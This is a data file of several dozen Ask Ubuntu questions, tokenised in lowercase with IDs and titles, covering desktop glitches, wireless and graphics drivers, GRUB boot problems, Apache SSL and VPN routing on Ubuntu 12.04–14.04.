500356	sometimes maximized windows have blank menu	i have ubuntu 14.04 . for some programs when the window is maximized the top bar does not have anything in it on the left side . this becomes an issue because it is also not controlling the window . usually when i click the top bar and drag the window i can get it to disable the maximization and move it around . when this issue happens nothing happens when trying to drag the window i.e . the top bar does not seem to have control over the window selected . dragging with alt key works . some times the menus appear and there is the window name but the dragging does still not work . programs with this behaviour are at least gnome terminal ( normal terminal ) and image viewer . this problem does not appear to happen with firefox but some times the maximize , minimize and close buttons are gone . what might be causing this ? not enough reputation to actually show the problem .
500357	opening multiple terminal tabs and running command	i need to open multiple terminal tabs , give them titles , go to a directory , and make each tab run a command . i am new to linux and shell scripting , after searching online and checking some solutions , i made this script ( edited based on answers below ) : # ! /bin/bash cd /media/extra/project tab= '' -- tab-with-profile=default '' options= ( -- tab -- title=terminal ) cmds [ 1 ] = '' 'rails s ' '' titles [ 1 ] = '' server '' cmds [ 2 ] = '' 'rails c ' '' titles [ 2 ] = '' console '' for i in 1 2 ; do options+= ( $ tab -- title= '' $ { titles [ i ] } '' -e `` bash -c \ '' $ { cmds [ i ] } ; bash\ '' '' ) done gnome-terminal `` $ { options [ @ ] } '' exit 0 it opens the tabs , names them , but fail to execute the commands generating this error : there was an error creating the child process for this terminal another shortcoming is that if i halted the running command it closes the tab , which i do n't want . i need to be able to stop the command and run it again within the same tab . what is wrong with the script ? is there another simpler way to do that ? note : if i removed the ( -e `` \ '' bash -c $ { cmds [ i ] } ; bash\ '' '' ) part from the command , it opens the tabs in the given directory and name them , with no errors . -edit-1 : after applying @ tuknutx answer below and editing the script , the error does n't appear anymore , but it gives me bash : rails c : command not found and rails s creates a new rails app instead of starting the rails server , i am using .rmvrc to select a gemset once this folder is accessed .
500359	''efi boot partition '' and ''biosgrub '' partition	why do i need these ? i have installed ubuntu under a non uefi ( master boot record ) and have installed ubuntu with no 'biosgrub ' and it works fine , whereas other times i am asked to make a 'biosgrub ' partition . i have no idea why sometimes i need it and others i do n't ( these have both been on the same system . and the same thing happens when i use uefi ( guid partition table ) only difference is i am asked to make a 'efi boot partition ' but as with the 'biosgrub ' sometimes i am asked to make it and sometimes i am not asked to make it . for my current install i was asked to make one but i did n't and my system is fine . there is no change in the system , same hardware , bios etc ... could anyone shed light on this ?
500360	graphics drvier problem in lenovo g505s	i am recently buy lenovo g505s laptop on amd a8 5550m and amd radeon hd 8500m+8550g graphics processor .after i install ubuntu 13.10 , 14.04 also on my laptop successfully installed then error graphics troubleshooing `` low graphics problem `` when we start my laptop not run ubuntu please help me
500361	my wireless dosenot work on rtl8723ae	i have ubuntu 14.04 first time wireless work great after i update ubuntu wireless did not work os release distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty kernel linux dead-satellite-c850-b559 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter [ 10ec:8723 ] subsystem : realtek semiconductor co. , ltd. device [ 10ec:0723 ] kernel driver in use : rtl8723ae 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : toshiba america info systems device [ 1179 : fb37 ] kernel driver in use : r8169 lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04f2 : b307 chicony electronics co. , ltd bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 04e8:61b3 samsung electronics co. , ltd bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0930:021d toshiba corp . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub pcmcia card info rfkill 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no lsmod rtl8723ae 86464 0 rtl_pci 26690 1 rtl8723ae rtlwifi 63475 2 rtl_pci , rtl8723ae mac80211 626489 3 rtl_pci , rtlwifi , rtl8723ae cfg80211 484040 2 mac80211 , rtlwifi iw reg get country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig wlan0 up # line maintained by pppoeconf provider dsl-provider auto wlan0 iface wlan0 inet manual iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off route kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 resolv.conf nameserver 127.0.1.1 search wag54gs nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ auto ethernet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : r8169 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.110 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 168.187.147.244 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8723ae state : unmanaged default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true networkmanager.conf [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq no-auto-default= < mac address removed > , [ ifupdown ] managed=false iwlist wlan0 scan completed : cell 01 - address : < mac address removed > channel:1 frequency:2.412 ghz ( channel 1 ) quality=34/70 signal level=-76 dbm encryption key : on essid : '' mayang511 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000000007ceb466 extra : last beacon : 4ms ago ie : unknown : 00094d6179616e67353131 ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1abc011bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601080000000000000000000000000000000000000000 ie : unknown : dd090010180203000c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f202010185000132000027a4000041435e0061322f00 cell 02 - address : < mac address removed > channel:6 frequency:2.437 ghz ( channel 6 ) quality=32/70 signal level=-78 dbm encryption key : on essid : '' nile '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000000c43d1942 extra : last beacon : 4ms ago ie : unknown : 00046e696c65 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : unknown : 32040c121860 ie : unknown : dd06001018020201 iwlist channel wlan0 13 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz modinfo filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl8723ae/rtl8723ae.ko firmware : rtlwifi/rtl8723fw_b.bin firmware : rtlwifi/rtl8723fw.bin description : realtek 8723e 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : d3e2984fd11b8b20faf9d09 alias : pci : v000010ecd00008723sv*sd*bc*sc*i* depends : rtlwifi , rtl_pci , mac80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : ips : set to 0 to not use link power save ( default 1 ) ( bool ) parm : swlps : set to 1 to use sw control power save ( default 0 ) ( bool ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko description : pci basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : b6b8aa929b5f982954a6de1 depends : mac80211 , rtlwifi intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : c21fc2f90947540319de390 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : d9:06:21:70:6e:8d:06:60:4d:73:0b:35:9f : c0 sig_hashalgo : sha512 modules lp rtc blacklist [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb udev rules # pci device 0x10ec:0x8136 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8723 ( rtl8723ae ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' dmesg [ 13.153939 ] rtl8723ae : using firmware rtlwifi/rtl8723fw_b.bin [ 13.299994 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 13.300225 ] rtlwifi : wireless switch is on [ 14.520994 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready i have do all solution and it did n't work , i have downloaded alot of drivers but when i make command make there is error
500362	separate workspaces , not one huge screen	in ubuntu 14.04 when the workspaces are enabled if a window is placed over the edge of the window it will also show in the next workspace . one messy workspace will basically ruin the workspaces next to it . also if a window sitting more than 50 % over the workspace is maximized it will maximize on the other workspace causing it to disappear from the current workspace . how can i stop this from happening ?
500363	help booting from disk	i already have ubuntu 12.04 lts installed on my computer , but i would like to get windows back onto it . the only problem is that i ca n't boot from any cd/usb/sd , all i get is the grub boot menu , without an option for the windows 7 install cd . any help would be appreciated .
500366	how to hide unity launcher border line	i 'm on 14.04 . i have my launcher on full transparency and i 've hidden the containing boxes , and to complete the picture and have the icons completely hovering , it 'd be nice to hide the border line or change the colour . is that possible ?
500367	how to get partially localized system ?	my ubuntu 14.04 is in polish and this translation is quite low quality . how to set up ubuntu so that it is displayed in english , but keep calendar and date format polish-like ( i.e . week starting from monday , not sunday ) ?
500370	setting up wireless hotspot to be on at boot	tl ; dr : can i set ubuntu up to - from boot - have the wireless hotspot turned on ? my mother-in-law lives so far from civilization that she can only reach the internet through a 3g dongle , which works fine . her devices* , however , are not so clever . using her computer as a wireless hotspot works fine , but it has to be turned on manually after a reboot , and crucially , i 've set the computer up so she does n't have root or sudo access . can i set ubuntu up to - from boot - have the wireless hotspot turned on ? * : most importantly , her e-book reader that keeps her from going all out cat person insane
500371	how to make apache 2 stop asking for a password for an ssl certificate ?	i just added an ssl certificate to apache . the problem is that apache runs on system startup and after my server turns on , apache runs but does n't run . i put in the ip address of my computer and my browser just keeps trying to connect . i see a spinning circle . then i get on my server , kill all apache-related processes , and run sudo service apache2 restart . because of the sudo i am prompted for my super-user password , but after i put it in , apache asks for the password for the .key file . i put it in and then apache works fine . the ssl even works . so why does apache not work until i restart it ? is it because it wants me to put in the password every startup ? if so , how do i do that on my xubuntu server ? can i make it so i wo n't have to put it in every time ?
500373	how to install cinnamon on ubuntu	i 've read some things in some forums however they usually tell me to add a ppa third , to update and run the command apt to install the cinnamon , but it never works . when running the command returns the terminal saying it is impossible to install due to lack of dependencies , and which i can not download and install individually . i 've tried adding the repositories of linux mint to ubuntu , nothing bad . i wonder how to do that or compile the source code .
500375	trouble changing the apn `` messagecenter '' parameters for mms in ubuntu touch	i installed ubuntu touch on my nexus 4 ( 14.10 ( r133 ) and i need to change the parameters in the apn contexts list for `` messagecenter '' to show the correct mms settings for my carrier . i use a sub-carrier for t-mobile here is the us and there is one bit of text that needs to change in order to use mms . i have no issue changing parameters for the apn `` name '' or `` accesspointname '' to show my carrier using ./set-context-property 0 command , only when trying to use `` messagecenter '' . this is what i need to change ( or edit ) : messagecenter = http : //mms.msg.eng.t-mobile.com/mms/wapenc this what i used ( just need to add smpl to the address ) : ./set-context-property 0 messagecenter http : //smpl.mms.msg.eng.t-mobile.com/mms/wapenc here 's the error : error setting context /ril_0/context1 property messagecenter : org.ofono.error.invalidarguments : invalid arguments in method call so , not sure if this parameter can actually be changed or if it 's a different command to just edit the parameter itself . hoping it 's just something simple . thanks .
500379	ubuntu 14.04 does n't recognize all keys with paired bluetooth keyboard	i 'm trying to connect a logitech harmony hub as a bluetooth keyboard to my ubuntu 14.04 linux htpc . the pairing worked fine and the device is recognized as a keyboard in bluetooth settings . some keys are working fine , for example select/enter or up/down/left/right or backspace . some keys are not recognized at all . in hcidump -t -x , a working key looks like this : 2014-07-20 20:52:17.981119 > acl data : handle 11 flags 0x02 dlen 14 l2cap ( d ) : cid 0x0042 len 10 [ psm 0 ] 0000 : a1 01 00 00 28 00 00 00 00 00 ... . ( ... .. 2014-07-20 20:52:18.038588 > acl data : handle 11 flags 0x02 dlen 14 l2cap ( d ) : cid 0x0042 len 10 [ psm 0 ] 0000 : a1 01 00 00 00 00 00 00 00 00 ... ... ... . and a non-working key like this : 2014-07-20 20:51:12.424281 > acl data : handle 11 flags 0x02 dlen 14 l2cap ( d ) : cid 0x0042 len 10 [ psm 0 ] 0000 : a1 03 f4 01 00 00 b3 24 00 00 ... ... . $ .. 2014-07-20 20:51:12.456754 > acl data : handle 11 flags 0x02 dlen 14 l2cap ( d ) : cid 0x0042 len 10 [ psm 0 ] 0000 : a1 03 00 00 00 00 b3 24 00 00 ... ... . $ .. the first is recognized in evtest like this event : time 1405885439.251978 , type 1 ( ev_key ) , code 28 ( key_enter ) , value 1 event : time 1405885439.251978 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1405885439.309474 , type 1 ( ev_key ) , code 28 ( key_enter ) , value 0 event : time 1405885439.309474 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- the second does not show up in evtest at all . i 'm understand i probably have to set up a key mapping for the additional keys but as far as i understand hcidump , this seems to be a different type of event ? could somebody explain how i can map the other key event so it is recognized by ubuntu ?
500380	lubuntu 14.04 drivers issue	i am new to linux , and have had a difficult time trying to get any linux distro installed on this system - but i have finally got lubuntu 14.04 installed and running . i am now having issues with drivers . if i open up the additional drivers tab in software updater , i am given no drivers to install . my ati radeon xpress 200m graphics card is working with the native radeon driver , but i would like to use a better driver if possible . my marvell ethernet card is working with the sky2 driver , but sadly my wireless card is not working at all . it is a realtek rtl8185l card , but lubuntu has assigned it the rtl8180 driver . if i run lspci -nnk | grep -ia2 net , my actual ethernet card and wireless card are both marked as `` ethernet controller . '' any suggestions for how to get this straightened out ? edit 1 : here 's the code : ( strangely enough , this command also lists my wifi card as ethernet . ) 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rc410m [ mobility radeon xpress 200m ] ( prog-if 00 [ vga controller ] ) subsystem : gateway , inc. device 0318 flags : bus master , 66mhz , medium devsel , latency 66 , irq 10 memory at d8000000 ( 32-bit , prefetchable ) [ size=128m ] i/o ports at 9000 [ size=256 ] memory at d0000000 ( 32-bit , non-prefetchable ) [ size=64k ] [ virtual ] expansion rom at d0020000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 2 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- kernel driver in use : radeon 02:00.0 ethernet controller : marvell technology group ltd. 88e8038 pci-e fast ethernet controller ( rev 14 ) subsystem : gateway , inc. device 0318 physical slot : 0 flags : bus master , fast devsel , latency 0 , irq 42 memory at d0100000 ( 64-bit , non-prefetchable ) [ size=16k ] i/o ports at a000 [ size=256 ] capabilities : [ 48 ] power management version 2 capabilities : [ 50 ] vital product data capabilities : [ 5c ] msi : enable+ count=1/2 maskable- 64bit+ capabilities : [ e0 ] express legacy endpoint , msi 00 kernel driver in use : sky2 08:09.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8185 ieee 802.11a/b/g wireless lan controller ( rev 20 ) subsystem : realtek semiconductor co. , ltd. device 8225 flags : bus master , medium devsel , latency 64 , irq 16 i/o ports at b000 [ size=256 ] memory at d0200000 ( 32-bit , non-prefetchable ) [ size=512 ] capabilities : [ 50 ] power management version 2 kernel driver in use : rtl8180 edit 2 : i think i am going to stick with the native radeon driver , as i can not find a suitable proprietary driver , and this card is quite old . edit 3 : i have tried connecting using iwconfig , but the terminal replies unresponsively . edit 4 : i think i 've finally found the problem ! i found this troubleshooting page for the rtl8180 card ( lubuntu assigned me this card 's native driver ) . from the page : this driver supports unencrypted networks and wep protected networks . however it looks like more advanced encryption ( like wpa ) is not available with open-source driver . my network is using wpa2 . could this be the problem ? if so , why is n't my card detecting any of the nearby wep networks ? *i just did a network scan , and i found that all nearby networks are now using wpa . though , realtek provides a proprietary driver for my card on their site , it is outdated and can no longer be compiled with newer versions of linux-headers . i have emailed realtek support about this , ( according to many other users on various forums , they have newer versions of the driver that are not posted on the site , but are instead provided via a private download link . ) in the meantime , i am thinking about switching to ndiswrapper . thoughts ? edit 5 : i have installed ndiswrapper . i tried installing the windows xp version of the rtl8185l driver from realtek 's site , but then the wlan0 interface disappeared completely from lshw and iwconfig . by the way , in order to install lubuntu , i had to disable acpi . could that be causing the problem ? edit 6 : i visited the ndiswrapper sourceforge wiki , and found this page that is supposed to contain drivers for cards that are working under ndiswrapper . everytime i visit the page i get a 403 `` create access required '' error . i am logged in with an email verified sourceforge account . i have tried on two different machines , with two different browsers ( firefox and safari ) . edit 7 : i 'm not really sure that this is a driver issue anymore . the device is not hard or software blocked . ( rfkill list all )
500383	setxkbmap -option ctrl : swapcaps makes ctrl caps but caps functionless	i 'm trying to switch ctrl and caps for emacs but it seems to be that this command only puts the caps option on ctrl and not vice versa i.e . the caps key does nothing at all afterwards . my method of testing is to use ctrl+t to open up a new tab on chrome , and it does work with rctrl but not caps . i am using a us keyboard . the command worked fine yesterday but not after rebooting , and i have tried rebooting again today but the command remains dysfunctional . this seems to be a problem with any command that modifies caps lock , in that it utterly becomes dysfunctional . is there any reason why caps lock will not take any modifications ? thanks . for example , swapesc adds the caps lock functionality to esc but not vice versa ( tested by trying to cancel out of a command in emacs using esc 3 times ) . using gnome-tweak-tool to make caps lock an additional ctrl key does not do anything either .
500388	invalid arch independent elf magic + grub rescue screen , no fixes i 've tried yet have worked	i know there 's a lot of questions online already similar to my own , but i 've tried all of the solutions i can find . normally i 'm able to fix my issues on my own with the help of this forum , but when trying to help my friend with his laptop i finally hit a wall and thought i 'd ask a question myself . he installed ubuntu 12.04 , dual booting with windows 8 . his window booter was n't working , so i told him to try boot-repair , and i forgot that the option for fixing the windows mbr was in the advanced options until after the boot-repair had run . so we restarted the computer just in case it fixed the problem . once we did that , we got the invalid arch independent elf magic error . so i tried a few of the fixes i found on this forum , including running sudo mount /dev/sda10 /mnt sudo grub-install -- boot-directory=/mnt /dev/sda this did not fix the problem . i 'm at a loss , help would be appreciated . i ran boot-repair again to grab this : http : //paste.ubuntu.com/7826738/
500389	ubuntu and mint dual boot -- grub rescue -- -lilo-grub2	i have long and interesting story to share and need desperate help . i consider myself n beginner linux user not absolutely a noob . i have dual boot system with xubuntu 14.04 lts and linux mint 13.10 . i have several problems . my initial idea was to install two debian-based linux system with a common swap common boot partition and two linux separate and independent and a common hard disk for other data , movies , music etc . so , i tried to follow the instructions from a wbsite and probably messed up a lot . when i tried to do this i had xubuntu 13.04 which i wanted to replace with lts 14.04 along with linux mint 13.10 . ( though i did not like linux mint much firstly it is slow and sometimes it automatically restarts . but from an initial feed back i relied heavily on it and installed a lot of indispensable stuff which i do not want to mess . ) but after i configured my 14.04 lts properly i wanted to delete linux mint . so , i used to gparted to delete some old partition to extend my lts space as it is just 10 gb space /dev/sda11/ but i could not extend as obvious from the .png file . now i want to know 1 ) if i delete the linux mint folders /dev/sda5-10 and replace it will my lts /dev/sda11 will be deleted also ? 2 ) secondly after i deleted some old partition for extending lts . i faced a problem of grub rescue i somehow managed it but by mistake i installed lilo instead of grub2 . and now i want to install grub2 again replacing lilo and configure so that i can get the beautiful and known bootloader of grub2 . 3 ) thirdly in lilo , now the entire linux mint partition is missing.would someone please help me out ? well as i can not post any image . i am trying to describe my partitions i have a /dev/sda1 partition of 600 mb for bootloader /dev/sda2 swap partition for common use -8 gb /dev/sda3 extended partition under which there are several partitions /dev/sda5-10 linux mint /tmp / /usr , /home /var /opt /dev/sda11 also under the extended partition -xubuntu lts 14.04 10 gb /dev/sda4 ext4 partition 340 gb for common usage . please help me out . i can still access my xubuntu but not linux mint . link for the image of my partition http : //i1276.photobucket.com/albums/y468/arijithazra/linux-partition_zpsa2dbff98.png
500392	bios do n't boot from usb	i have a sony vaio vgn-fe41e , which comes with windows vista pre-installed . a year ago i installed ubuntu 12.04 with an usb and it worked perfectly fine . now due to some errors i have to reinstall ubuntu and i 'm gon na try ubuntu 14.04 . so i 've downloaded the .iso and i 've created an usb using startup disk creator . but when i restart the laptop it does n't boot using the usb . i 've tried many configurations and different softwares to create the usb , but still does n't work . any help ? edit : maybe it 's related to the fact that yesterday i 've upgraded ubuntu to 14.04 . it went tremendously wrong , but maybe the grub was indeed upgraded . also , my bios version is r0190j3 .
500395	my toshiba satellite p855-331 pspkfe laptop 's keyboard backlight is not working under ubuntu 14.04	my toshiba satellite p855-331 pspkfe backlit keyboard not working under ubuntu 14.04 . in bios and bootup it works but after ubuntu boots , it is not working anymore . i have read similar threads of other toshiba models . any solution ?
500399	ubuntu 12.04 asus usb-n13 802.11 b/g/n wireless connection weak after reboot	i have struggled with slow wireless connection for months . to find a solution , i have searched and read many posts about slow/intermittent wireless connections , and tried the suggestions with partial success . now i have got it working but every time i reboot my system , the wireless speed goes down significantly . i can test this by the command iwconfig . so after each reboot i have to remove the driver and install it again to get my wireless speed back . here is some more info : os : ubuntu 12.04 lts usb : asus usb-n13 802.11 b/g/n usb driver : realtek rtl8192cu version 4.0.2_9000 command to remove the driver : sudo rmmod rtl8192cu command to install : sudo bash ./install.sh ( to be run from the driver 's directory ) by the way , this does not happen when i suspend the system , only when i reboot . i was wondering if anybody can tell me why this is happening . what process gets in the way of wireless that after reboot it becomes so slow ? !
500405	ubuntu 12.04 lts graphics drivers	en i have a graphics card amd radeon hd 4350 and i 've heard that you can use the proprietary drivers for ubuntu 12.04 . can someone tell me how to install them ? : ) because i installed some , but caused the screen to flicker and the system in august suited only for reinstallation . pl posiadam karte graficzną amd radeon hd 4350 i słyszałem że mozna uzywać sterowników własnościowych na ubuntu 12.04 . może mi ktoś powiedzieć jak je zainstalować ? : ) bo instalowałem jakieś , ale spowodowały mruganie ekranu i system sie nadawał tylko do reinstalacji .
500406	dual os running problem . ubuntu is ok but windows 7 carsh down	i have installed ubuntu 14.04lts besides windows 7 ultimate after made a separate partition for ubuntu . generally i intend to boot windows and ubuntu running together . i followed up all installation process step by step . i faced problem when i want to boot window 7. it says , '' an error occurred '' please insert a disk . i have fresh windows disk and try to repair windows . but its unable to repair my windows . i do n't have second option of backup restore because when i installed ubuntu i did n't take any backup . please give me a right way solution . i do not want to reinstall windows . what i have now want to modify.besides also want to running ubuntu . thanks
500409	screen noise playing videos on 14.04 using nvidia geforce gt610 with nvidia driver 340	the noise looks like little horizontal white streaks/broken lines that come and go very briefly , remeniscient of a noisey video cable . when i used the nouveau driver , it does n't happen at all . i tried an older geforce 9400gt card and it does n't happen . anyone else have a similar experience with geforce series gt600 cards ? should i just forget the gt600 series ?
500412	endless loop upgrading 13.10 to 14.04 , disk now full , usb dvd drives not working	is there any way i can copy my data somewhere else ? properties says `` 499,743 items , totalling 48.3 gb 0 bytes free '' . says `` unable to mount drive e '' with 7 lines of text . unable to access uui . dvd drive not shown .
500413	replaced win8 with ubuntu , unable to read from my second hdd	so i 've replaced windows 8 with ubuntu and gparted ca n't read the file system type of what are former windows8 ntfs partitions . it ca n't be mounted , only formatted . what can i do to retrieve my data ? **update : **this is what i got after the sudo parted -l command model : ata wdc wd1003fzex-0 ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 17,4kb 134mb 134mb microsoft reserved partition msftres 2 135mb 1000gb 1000gb storage pool i 've also googled removing hiberfile and entered this line , below is the result sudo mount -t ntfs-3g -o remove_hiberfile /dev/sdb1 /media/fe46d60c46d5c615do failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ?
500414	putting the taskbar on the lateral on gnome classic	is it possible to put the taskbar on the lateral on gnome classic , and put all the program tabs and icon launchers there ? i find that to be the most efficient way to use screen space . i would like to have an arrangement similar to what you can have on windows , like this : http : //i.imgur.com/ncjmueh.png thanks
500417	wineapp ... ... ... ... unimplemented function msvcr90.dll	i downloaded wine because i use photokey for my photos . i attepmted to open the program after i downloaded it . the message below is what i encountered . please help ! ! ! ! unhandled exception : unimplemented function msvcr90.dll._wcsnset_s called in 32-bit code ( 0x7b83aace ) .
500418	install non-aura chromium on 14.04 lts	i just upgrade from 12.04 to 14.04 and for some reason chromium installed as aura . i tried purging it and reinstalling but am still get it .
500427	ubuntu crash / crazy colors	yesterday i installed ubuntu 14.04 via usb , and after logging into my account , the screen freezes and shows some colors like these http : //i.stack.imgur.com/xmbo7.jpg sometimes if i enter in guest mode , i get the message `` all of the files i save on the account will be deleted '' , i click ok and it crashes again ...
500428	grub black screen	i start mine gisfriend 's computer and all i get is a black screen with no cursor . just a completely black screen . i hold down the shift key , but grub does not come up . i just finished installing the latest desktop version . after install finished it rebooted then just went black . i have an nvidia geforce 9200m gs graphics card . thanks : )
500435	routing internet traffic through vpn only when connected	i set up a pptp vpn server and can connect to it with my laptop without any problems . however , connecting to the vpn causes issue with routing ( i.e . i am not about to connect to the outside web ) . to solve this on my laptop ( i 'm using ubuntu 14.04 ) , i went into edit connections > wireless > ( network name ) > edit > route and checked the `` use this connection only for resources on its network '' . this allowed me to connect to the outside web when connected to my vpn , but as soon as i disconnect , i lost access to the outside web until i until i unset the `` use this connection only for resources on its network '' option . it seems like there must be a better way than manually setting and unsetting this option . ideally i would like : connected to vpn : all traffic on my laptop goes through vpn not connected to vpn : all traffic goes through my whatever network i 'm on any idea ?
500438	how can i package a jeos for juju ?	i saw that there is a jeos ( just enough operating system ) ubuntu image . i have also seen some other templates out there too . i believe one was oracle linux , and it had templates available . what is the best way to configure the jeos and make it available in my juju environment ?
